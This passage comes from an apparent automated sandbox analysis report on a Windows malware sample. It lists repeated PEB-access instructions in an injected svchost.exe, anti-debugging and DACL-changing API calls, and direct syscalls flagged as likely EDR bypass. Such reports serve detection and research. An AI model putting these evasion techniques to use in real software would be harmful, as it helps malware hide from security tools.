Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B84755 mov eax, dword ptr fs:[00000030h]	2_2_00B84755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3674D mov esi, dword ptr fs:[00000030h]	2_2_00B3674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3674D mov eax, dword ptr fs:[00000030h]	2_2_00B3674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3674D mov eax, dword ptr fs:[00000030h]	2_2_00B3674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8C89D mov eax, dword ptr fs:[00000030h]	2_2_00B8C89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00887 mov eax, dword ptr fs:[00000030h]	2_2_00B00887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C8F9 mov eax, dword ptr fs:[00000030h]	2_2_00B3C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C8F9 mov eax, dword ptr fs:[00000030h]	2_2_00B3C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCA8E4 mov eax, dword ptr fs:[00000030h]	2_2_00BCA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E8C0 mov eax, dword ptr fs:[00000030h]	2_2_00B2E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA483A mov eax, dword ptr fs:[00000030h]	2_2_00BA483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA483A mov eax, dword ptr fs:[00000030h]	2_2_00BA483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A830 mov eax, dword ptr fs:[00000030h]	2_2_00B3A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov eax, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov eax, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov eax, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov ecx, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov eax, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B22835 mov eax, dword ptr fs:[00000030h]	2_2_00B22835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8C810 mov eax, dword ptr fs:[00000030h]	2_2_00B8C810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96870 mov eax, dword ptr fs:[00000030h]	2_2_00B96870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96870 mov eax, dword ptr fs:[00000030h]	2_2_00B96870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8E872 mov eax, dword ptr fs:[00000030h]	2_2_00B8E872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8E872 mov eax, dword ptr fs:[00000030h]	2_2_00B8E872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B30854 mov eax, dword ptr fs:[00000030h]	2_2_00B30854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04859 mov eax, dword ptr fs:[00000030h]	2_2_00B04859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04859 mov eax, dword ptr fs:[00000030h]	2_2_00B04859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B12840 mov ecx, dword ptr fs:[00000030h]	2_2_00B12840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B889B3 mov esi, dword ptr fs:[00000030h]	2_2_00B889B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B889B3 mov eax, dword ptr fs:[00000030h]	2_2_00B889B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B889B3 mov eax, dword ptr fs:[00000030h]	2_2_00B889B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B129A0 mov eax, dword ptr fs:[00000030h]	2_2_00B129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B009AD mov eax, dword ptr fs:[00000030h]	2_2_00B009AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B009AD mov eax, dword ptr fs:[00000030h]	2_2_00B009AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B329F9 mov eax, dword ptr fs:[00000030h]	2_2_00B329F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B329F9 mov eax, dword ptr fs:[00000030h]	2_2_00B329F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8E9E0 mov eax, dword ptr fs:[00000030h]	2_2_00B8E9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A9D0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B349D0 mov eax, dword ptr fs:[00000030h]	2_2_00B349D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCA9D3 mov eax, dword ptr fs:[00000030h]	2_2_00BCA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B969C0 mov eax, dword ptr fs:[00000030h]	2_2_00B969C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8892A mov eax, dword ptr fs:[00000030h]	2_2_00B8892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B9892B mov eax, dword ptr fs:[00000030h]	2_2_00B9892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8C912 mov eax, dword ptr fs:[00000030h]	2_2_00B8C912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF8918 mov eax, dword ptr fs:[00000030h]	2_2_00AF8918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF8918 mov eax, dword ptr fs:[00000030h]	2_2_00AF8918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E908 mov eax, dword ptr fs:[00000030h]	2_2_00B7E908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E908 mov eax, dword ptr fs:[00000030h]	2_2_00B7E908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA4978 mov eax, dword ptr fs:[00000030h]	2_2_00BA4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA4978 mov eax, dword ptr fs:[00000030h]	2_2_00BA4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8C97C mov eax, dword ptr fs:[00000030h]	2_2_00B8C97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B26962 mov eax, dword ptr fs:[00000030h]	2_2_00B26962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B26962 mov eax, dword ptr fs:[00000030h]	2_2_00B26962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B26962 mov eax, dword ptr fs:[00000030h]	2_2_00B26962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B4096E mov eax, dword ptr fs:[00000030h]	2_2_00B4096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B4096E mov edx, dword ptr fs:[00000030h]	2_2_00B4096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B4096E mov eax, dword ptr fs:[00000030h]	2_2_00B4096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B80946 mov eax, dword ptr fs:[00000030h]	2_2_00B80946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08AA0 mov eax, dword ptr fs:[00000030h]	2_2_00B08AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08AA0 mov eax, dword ptr fs:[00000030h]	2_2_00B08AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B56AA4 mov eax, dword ptr fs:[00000030h]	2_2_00B56AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B38A90 mov edx, dword ptr fs:[00000030h]	2_2_00B38A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0EA80 mov eax, dword ptr fs:[00000030h]	2_2_00B0EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4A80 mov eax, dword ptr fs:[00000030h]	2_2_00BD4A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3AAEE mov eax, dword ptr fs:[00000030h]	2_2_00B3AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3AAEE mov eax, dword ptr fs:[00000030h]	2_2_00B3AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00AD0 mov eax, dword ptr fs:[00000030h]	2_2_00B00AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B34AD0 mov eax, dword ptr fs:[00000030h]	2_2_00B34AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B34AD0 mov eax, dword ptr fs:[00000030h]	2_2_00B34AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B56ACC mov eax, dword ptr fs:[00000030h]	2_2_00B56ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B56ACC mov eax, dword ptr fs:[00000030h]	2_2_00B56ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B56ACC mov eax, dword ptr fs:[00000030h]	2_2_00B56ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B24A35 mov eax, dword ptr fs:[00000030h]	2_2_00B24A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B24A35 mov eax, dword ptr fs:[00000030h]	2_2_00B24A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3CA38 mov eax, dword ptr fs:[00000030h]	2_2_00B3CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3CA24 mov eax, dword ptr fs:[00000030h]	2_2_00B3CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2EA2E mov eax, dword ptr fs:[00000030h]	2_2_00B2EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8CA11 mov eax, dword ptr fs:[00000030h]	2_2_00B8CA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7CA72 mov eax, dword ptr fs:[00000030h]	2_2_00B7CA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7CA72 mov eax, dword ptr fs:[00000030h]	2_2_00B7CA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAEA60 mov eax, dword ptr fs:[00000030h]	2_2_00BAEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3CA6F mov eax, dword ptr fs:[00000030h]	2_2_00B3CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3CA6F mov eax, dword ptr fs:[00000030h]	2_2_00B3CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3CA6F mov eax, dword ptr fs:[00000030h]	2_2_00B3CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B06A50 mov eax, dword ptr fs:[00000030h]	2_2_00B06A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10A5B mov eax, dword ptr fs:[00000030h]	2_2_00B10A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10A5B mov eax, dword ptr fs:[00000030h]	2_2_00B10A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB4BB0 mov eax, dword ptr fs:[00000030h]	2_2_00BB4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB4BB0 mov eax, dword ptr fs:[00000030h]	2_2_00BB4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10BBE mov eax, dword ptr fs:[00000030h]	2_2_00B10BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10BBE mov eax, dword ptr fs:[00000030h]	2_2_00B10BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08BF0 mov eax, dword ptr fs:[00000030h]	2_2_00B08BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08BF0 mov eax, dword ptr fs:[00000030h]	2_2_00B08BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08BF0 mov eax, dword ptr fs:[00000030h]	2_2_00B08BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8CBF0 mov eax, dword ptr fs:[00000030h]	2_2_00B8CBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2EBFC mov eax, dword ptr fs:[00000030h]	2_2_00B2EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAEBD0 mov eax, dword ptr fs:[00000030h]	2_2_00BAEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B20BCB mov eax, dword ptr fs:[00000030h]	2_2_00B20BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B20BCB mov eax, dword ptr fs:[00000030h]	2_2_00B20BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B20BCB mov eax, dword ptr fs:[00000030h]	2_2_00B20BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00BCD mov eax, dword ptr fs:[00000030h]	2_2_00B00BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00BCD mov eax, dword ptr fs:[00000030h]	2_2_00B00BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00BCD mov eax, dword ptr fs:[00000030h]	2_2_00B00BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2EB20 mov eax, dword ptr fs:[00000030h]	2_2_00B2EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2EB20 mov eax, dword ptr fs:[00000030h]	2_2_00B2EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC8B28 mov eax, dword ptr fs:[00000030h]	2_2_00BC8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC8B28 mov eax, dword ptr fs:[00000030h]	2_2_00BC8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7EB1D mov eax, dword ptr fs:[00000030h]	2_2_00B7EB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFCB7E mov eax, dword ptr fs:[00000030h]	2_2_00AFCB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAEB50 mov eax, dword ptr fs:[00000030h]	2_2_00BAEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB4B4B mov eax, dword ptr fs:[00000030h]	2_2_00BB4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB4B4B mov eax, dword ptr fs:[00000030h]	2_2_00BB4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA8B42 mov eax, dword ptr fs:[00000030h]	2_2_00BA8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96B40 mov eax, dword ptr fs:[00000030h]	2_2_00B96B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96B40 mov eax, dword ptr fs:[00000030h]	2_2_00B96B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCAB40 mov eax, dword ptr fs:[00000030h]	2_2_00BCAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B28CB1 mov eax, dword ptr fs:[00000030h]	2_2_00B28CB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B28CB1 mov eax, dword ptr fs:[00000030h]	2_2_00B28CB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB0CB5 mov eax, dword ptr fs:[00000030h]	2_2_00BB0CB5

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_007C0B62

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00792622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00792622
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0078083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0078083F
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007809D5 SetUnhandledExceptionFilter,	0_2_007809D5
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00780C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00780C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtProtectVirtualMemory: Direct from: 0x77537B2E	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
